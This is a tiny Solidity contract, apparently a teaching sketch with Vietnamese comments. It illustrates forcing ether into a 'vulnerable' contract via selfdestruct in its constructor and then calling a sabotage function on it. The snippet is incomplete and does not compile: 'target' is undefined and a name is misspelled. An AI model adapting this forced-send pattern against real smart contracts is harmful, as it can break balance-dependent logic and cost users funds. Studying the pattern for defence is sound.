pragma solidity ^0.4.18;

contract Suicide {
    function Suicide() payable {
        
        selfdestruct(target);               // Phá huỷ và chuyển tiền từ hợp đồng này sang hợp đồng Vunerable

        Vulnrable(target).somethingBad();   // Gọi hàm Phá hoại

    }
}